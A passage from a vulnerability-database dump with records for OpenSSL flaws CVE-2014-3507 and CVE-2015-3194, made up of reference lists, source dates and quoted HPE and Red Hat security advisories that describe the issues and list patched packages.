"https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.4, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60824" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.1, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.1, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60938" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140853041709441\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141077370928502\u0026w=2" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10109" }, { "trust": 1.1, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127502" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69078" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:158" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61250" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61040" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60778" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60684" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59743" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58962" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://linux.oracle.com/errata/elsa-2014-1052.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95161" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=d0a4b7d1a2948fce38515b8d862f43e7ba0ebf74" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3507" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-1052.html" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-1054.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684903" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004917" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1004931" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004872" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182969" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04426586" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04404655" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2deee-50da9c14daae3/cert_mini_security_bulletin_xrx15a_v1-01.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691014" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15573.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3509.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3507.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3511.html" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=d0a4b7d1a2948fce38515b8d862f43e7ba0ebf74" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35206" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512\u003e" }, { "trust": 0.1, "url": "http://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140806.txt\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch" }, { "trust": 0.1, "url": "http://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "http://security.freebsd.org/advisories/freebsd-sa-14:18.openssl.asc\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.patch.asc" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509\u003e" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-10.0.patch.asc" }, { "trust": 0.1, "url": "http://security.freebsd.org/patches/sa-14:18/openssl-9.3.patch" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139\u003e" }, { "trust": 0.1, "url": "http://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5139" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "BID", "id": "69078" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-131" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3507" }, { "db": "BID", "id": "69078" }, { "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-131" }, { "db": "NVD", "id": "CVE-2014-3507" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3507" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69078" }, { "date": "2014-08-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-09-09T17:32:22", "db": "PACKETSTORM", "id": "128214" }, { "date": "2014-08-08T21:50:05", "db": "PACKETSTORM", "id": "127803" }, { "date": "2014-09-15T17:53:34", "db": "PACKETSTORM", "id": "128248" }, { "date": "2014-08-14T02:24:57", "db": "PACKETSTORM", "id": "127861" }, { "date": "2014-08-14T22:49:56", "db": "PACKETSTORM", "id": "127869" }, { "date": "2014-08-08T21:48:03", "db": "PACKETSTORM", "id": "127799" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-131" }, { "date": "2014-08-13T23:55:07.450000", "db": "NVD", "id": "CVE-2014-3507" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2014-3507" }, { "date": "2016-07-26T23:00:00", "db": "BID", "id": "69078" }, { "date": "2015-06-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003811" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-131" }, { "date": "2023-11-07T02:20:09.987000", "db": "NVD", "id": "CVE-2014-3507" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127790" }, { "db": "CNNVD", "id": "CNNVD-201408-131" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of DTLS Implementation of d1_both.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003811" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-131" } ], "trust": 0.6 } }
var-201512-0483
Vulnerability from variot
crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the affected application; denying service to legitimate users. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c05157667
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05157667 Version: 1
HPSBMU03607 rev.1 - HPE BladeSystem c-Class Virtual Connect (VC) Firmware, Remote Denial of Service (DoS), Disclosure of Information, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-06-01 Last Updated: 2016-06-01
Potential Security Impact: Remote Cross-Site Request Forgery (CSRF), Denial of Service (DoS), Disclosure of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Multiple potential security vulnerabilities have been identified in HPE BladeSystem c-Class Virtual Connect (VC) firmware. These vulnerabilities include:
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information. The Cross-protocol Attack on TLS using SSLv2 also known as "DROWN", which could be exploited remotely resulting in disclosure of information. Additional OpenSSL and OpenSSH vulnerabilities which could be remotely exploited resulting in Denial of Service (DoS), disclosure of information, or Cross-site Request Forgery (CSRF).
References:
CVE-2016-0800 CVE-2016-0799 CVE-2016-2842 CVE-2015-1789 CVE-2015-1791 CVE-2015-3194 CVE-2015-0705 CVE-2015-5600 CVE-2014-3566 CVE-2008-5161 SSRT102281
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following firmware versions of Virtual Connect (VC) are impacted:
HPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45 HPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21
Note: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800, CVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and CVE-2016-2842.
The following products run the impacted versions of Virtual Connect (VC) firmware:
HPE VC Flex-10 10Gb Enet Module HPE Virtual Connect Flex-10/10D Module for c-Class BladeSystem HPE Virtual Connect FlexFabric 10Gb/24-port Module for c-Class BladeSystem HPE Virtual Connect FlexFabric-20/40 F8 Module for c-Class BladeSystem
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2016-0800 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-1789 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-1791 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-3194 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2008-5161 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2015-0705 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2016-0799 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2016-2842 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE has provided an updated version of the BladeSystem c-Class Virtual Connect (VC) firmware to address these vulnerabilities.
HPE BladeSystem c-Class Virtual Connect (VC) Firmware v4.50
The update can be downloaded from: http://h20564.www2.hpe.com/hpsc/swd/public /detail?swItemId=MTX_1f352fb404f5410d9b2ca1b56d
HISTORY Version:1 (rev.1) - 1 June 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:2617-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2617.html Issue date: 2015-12-14 CVE Names: CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 =====================================================================
- Summary:
Updated openssl packages that fix three security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
A NULL pointer derefernce flaw was found in the way OpenSSL verified signatures using the RSA PSS algorithm. A remote attacked could possibly use this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server using OpenSSL if it enabled client authentication. (CVE-2015-3194)
A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and CMS data. A remote attacker could use this flaw to cause an application that parses PKCS#7 or CMS data from untrusted sources to use an excessive amount of memory and possibly crash. (CVE-2015-3195)
A race condition flaw, leading to a double free, was found in the way OpenSSL handled pre-shared key (PSK) identify hints. A remote attacker could use this flaw to crash a multi-threaded SSL/TLS client using OpenSSL. (CVE-2015-3196)
All openssl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
i386: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-1.0.1e-42.el6_7.1.i686.rpm openssl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-perl-1.0.1e-42.el6_7.1.i686.rpm openssl-static-1.0.1e-42.el6_7.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm openssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm openssl-devel-1.0.1e-42.el6_7.1.i686.rpm openssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm openssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm openssl-static-1.0.1e-42.el6_7.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-42.el6_7.1.src.rpm
